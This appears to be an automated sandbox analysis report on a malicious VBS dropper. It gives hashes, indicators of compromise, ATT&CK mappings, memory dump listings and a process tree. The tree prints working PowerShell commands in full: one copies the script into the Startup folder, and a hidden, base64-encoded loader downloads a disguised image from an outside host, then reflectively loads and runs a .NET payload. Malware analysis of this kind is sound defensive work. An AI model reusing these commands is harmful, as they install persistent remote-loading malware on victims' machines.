6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6

General

Target

6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs
Size

320KB
MD5

be7f3a961e31db70ef7251ac44c46972
SHA1

b84c4321a2fc1bfcff4c5c915c820402b06940a7
SHA256

6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6
SHA512

73b11a57c9e16757ee493f98630a49498cc1424bc3a05d8746a09da3dc9153ec877cbd791f290d28436ef496a1e95deb0ae0dddcfa7f2324287fbbaf98b46132
SSDEEP

6144:DeeeeeDeeeee4WvwvMweeeeesMvlvsweeeeeIeeeee0eeeee1eeeee6eeeee4eeY:h

Score

10^/10

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

exe.dropper

https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
5	1176	powershell.exe
7	1176	powershell.exe
9	1176	powershell.exe

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs	powershell.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
2808	PING.EXE

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
2652	powershell.exe
2504	powershell.exe
1176	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2504	powershell.exe
Token: SeDebugPrivilege	1176	powershell.exe

Suspicious use of WriteProcessMemory 18 IoCs

description	pid	Process	procid_target
PID 1632 wrote to memory of 2596	1632	WScript.exe	30
PID 1632 wrote to memory of 2596	1632	WScript.exe	30
PID 1632 wrote to memory of 2596	1632	WScript.exe	30
PID 2596 wrote to memory of 2808	2596	cmd.exe	32
PID 2596 wrote to memory of 2808	2596	cmd.exe	32
PID 2596 wrote to memory of 2808	2596	cmd.exe	32
PID 2596 wrote to memory of 2704	2596	cmd.exe	33
PID 2596 wrote to memory of 2704	2596	cmd.exe	33
PID 2596 wrote to memory of 2704	2596	cmd.exe	33
PID 2704 wrote to memory of 2652	2704	cmd.exe	34
PID 2704 wrote to memory of 2652	2704	cmd.exe	34
PID 2704 wrote to memory of 2652	2704	cmd.exe	34
PID 1632 wrote to memory of 2504	1632	WScript.exe	36
PID 1632 wrote to memory of 2504	1632	WScript.exe	36
PID 1632 wrote to memory of 2504	1632	WScript.exe	36
PID 2504 wrote to memory of 1176	2504	powershell.exe	37
PID 2504 wrote to memory of 1176	2504	powershell.exe	37
PID 2504 wrote to memory of 1176	2504	powershell.exe	37

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:1632
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 & cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2596
- - C:\Windows\system32\PING.EXE
    ping 127.0.0.1 -n 5
    3⤵
    - Runs ping.exe
    PID:2808
- - C:\Windows\system32\cmd.exe
    cmd.exe /c "powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2704
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command [System.IO.File]::Copy('C:\Users\Admin\AppData\Local\Temp\6a35f563a00243f0f06b2e81a8911b6cf55be9cebb8561a45511e3e115d6d3a6_JC.vbs','C:\Users\' + [Environment]::UserName + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ÇWçcqeGYLGLKA.vbs')
      4⤵
      Drops startup file
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2652
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$Codigo = 'JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA1ADYAMwAvADYAMgAxAC8AbwByAGkAZwBpAG4AYQBsAC8AdQBuAGkAdgBlAHIAcwBvAF8AdgBiAHMALgBqAHAAZQBnAD8AMQA2ADkAMAA5ADMAMQA4ADUANQAnADsAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABpAG0AYQBnAGUAQgB5AHQAZQBzACAAPQAgACQAdwBlAGIAQwBsAGkAZQBuAHQALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAaQBtAGEAZwBlAFUAcgBsACkAOwAkAGkAbQBhAGcAZQBUAGUAeAB0ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAaQBtAGEAZwBlAEIAeQB0AGUAcwApADsAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACQAZQBuAGQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAEUATgBEAD4APgAnADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBJAG4AZABlAHgATwBmACgAJABzAHQAYQByAHQARgBsAGEAZwApADsAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAC0AZwBlACAAMAAgAC0AYQBuAGQAIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AZwB0ACAAJABzAHQAYQByAHQASQBuAGQAZQB4ADsAJABzAHQAYQByAHQASQBuAGQAZQB4ACAAKwA9ACAAJABzAHQAYQByAHQARgBsAGEAZwAuAEwAZQBuAGcAdABoADsAJABiAGEAcwBlADYANABMAGUAbgBnAHQAaAAgAD0AIAAkAGUAbgBkAEkAbgBkAGUAeAAgAC0AIAAkAHMAdABhAHIAdABJAG4AZABlAHgAOwAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABzAHQAYQByAHQASQBuAGQAZQB4ACwAIAAkAGIAYQBzAGUANgA0AEwAZQBuAGcAdABoACkAOwAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAGIAYQBzAGUANgA0AEMAbwBtAG0AYQBuAGQAKQA7ACQAbABvAGEAZABlAGQAQQBzAHMAZQBtAGIAbAB5ACAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKAAkAGMAbwBtAG0AYQBuAGQAQgB5AHQAZQBzACkAOwAkAHQAeQBwAGUAIAA9ACAAJABsAG8AYQBkAGUAZABBAHMAcwBlAG0AYgBsAHkALgBHAGUAdABUAHkAcABlACgAJwBGAGkAYgBlAHIALgBIAG8AbQBlACcAKQA7ACQAbQBlAHQAaABvAGQAIAA9ACAAJAB0AHkAcABlAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFYAQQBJACcAKQA7ACQAYQByAGcAdQBtAGUAbgB0AHMAIAA9ACAALAAoACcAdAB4AHQALgA0ADMAOQA5ADIAZwBqAC8AbAB0AC8ANwA2ADEALgAxADYAMQAuADYANQAxAC4ANAA5AC8ALwA6AHAAdAB0AGgAJwApADsAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIAAkAGEAcgBnAHUAbQBlAG4AdABzACkA'";$OWjuxd = [system.Text.encoding]::Unicode.GetString("[system.Convert]::Frombase64String( $codigo))";powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD""
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2504
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/563/621/original/universo_vbs.jpeg?1690931855';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI');$arguments = ,('txt.43992gj/lt/761.161.651.49//:ptth');$method.Invoke($null, $arguments)"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1176

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Remote System Discovery

1

T1018

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
4d73329eb00c114fad525f13d32291f3

SHA1
5aacf91461234416208a9fa938a9423da67cb286

SHA256
8dd406f2cfbeb2b952a476106e0b46501fc38c2c4fa3a7a5c4a747e7ddbae6fa

SHA512
06e01c65fd8b8491eb9f4908a069d8b7293a63261c806d4c7226ea663df0f16d1a9bde61983c36ce4af7bb570dbdc21cee671f07662f43474b6672e26380f583

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab7957.tmp

Filesize
61KB

MD5
f3441b8572aae8801c04f3060b550443

SHA1
4ef0a35436125d6821831ef36c28ffaf196cda15

SHA256
6720349e7d82ee0a8e73920d3c2b7cb2912d9fcf2edb6fd98f2f12820158b0bf

SHA512
5ba01ba421b50030e380ae6bbcd2f681f2a91947fe7fedb3c8e6b5f24dce9517abf57b1cf26cc6078d4bb53bde6fcfb2561591337c841f8f2cb121a3d71661b9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar7979.tmp

Filesize
163KB

MD5
9441737383d21192400eca82fda910ec

SHA1
725e0d606a4fc9ba44aa8ffde65bed15e65367e4

SHA256
bc3a6e84e41faeb57e7c21aa3b60c2a64777107009727c5b7c0ed8fe658909e5

SHA512
7608dd653a66cd364392a78d4711b48d1707768d36996e4d38871c6843b5714e1d7da4b4cc6db969e6000cfa182bcb74216ef6823d1063f036fc5c3413fb8dcf

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fe61dc58be8eb0946219b90aac0904b0

SHA1
9f5409becb705007536b4809576fb866b254b26a

SHA256
3589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5

SHA512
c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
fe61dc58be8eb0946219b90aac0904b0

SHA1
9f5409becb705007536b4809576fb866b254b26a

SHA256
3589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5

SHA512
c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ZYNQ4GSTYJ189KG9847D.temp

Filesize
7KB

MD5
fe61dc58be8eb0946219b90aac0904b0

SHA1
9f5409becb705007536b4809576fb866b254b26a

SHA256
3589f47015edfe51b78c700808758b95f67474e969f1ef430ca6165006aae0e5

SHA512
c2d89f07a4b9bdab0c8f0b0f47352189fa593fe5e3d06552ef719bac1a95926cb32fbe9ca3ef09e258378c9f452d7c6f6f493cd2f2d2033dac4e870b5072daf9

Download Submit
memory/1176-39-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-40-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-107-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/1176-43-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-42-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-41-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/1176-38-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/1176-33-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-32-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-31-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/1176-28-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/1176-30-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/1176-29-0x00000000025F0000-0x0000000002670000-memory.dmp

Filesize
512KB

Download
memory/2504-18-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/2504-21-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-16-0x000000001B2D0000-0x000000001B5B2000-memory.dmp

Filesize
2.9MB

Download
memory/2504-19-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/2504-35-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-36-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-37-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-20-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-108-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/2504-22-0x00000000025E0000-0x0000000002660000-memory.dmp

Filesize
512KB

Download
memory/2504-34-0x000007FEF48B0000-0x000007FEF524D000-memory.dmp

Filesize
9.6MB

Download
memory/2504-17-0x00000000022A0000-0x00000000022A8000-memory.dmp

Filesize
32KB

Download
memory/2652-10-0x000000000261B000-0x0000000002682000-memory.dmp

Filesize
412KB

Download
memory/2652-9-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2652-7-0x000007FEF5250000-0x000007FEF5BED000-memory.dmp

Filesize
9.6MB

Download
memory/2652-5-0x0000000002570000-0x0000000002578000-memory.dmp

Filesize
32KB

Download
memory/2652-8-0x0000000002614000-0x0000000002617000-memory.dmp

Filesize
12KB

Download
memory/2652-4-0x000000001B190000-0x000000001B472000-memory.dmp

Filesize
2.9MB

Download

Analysis

Sharing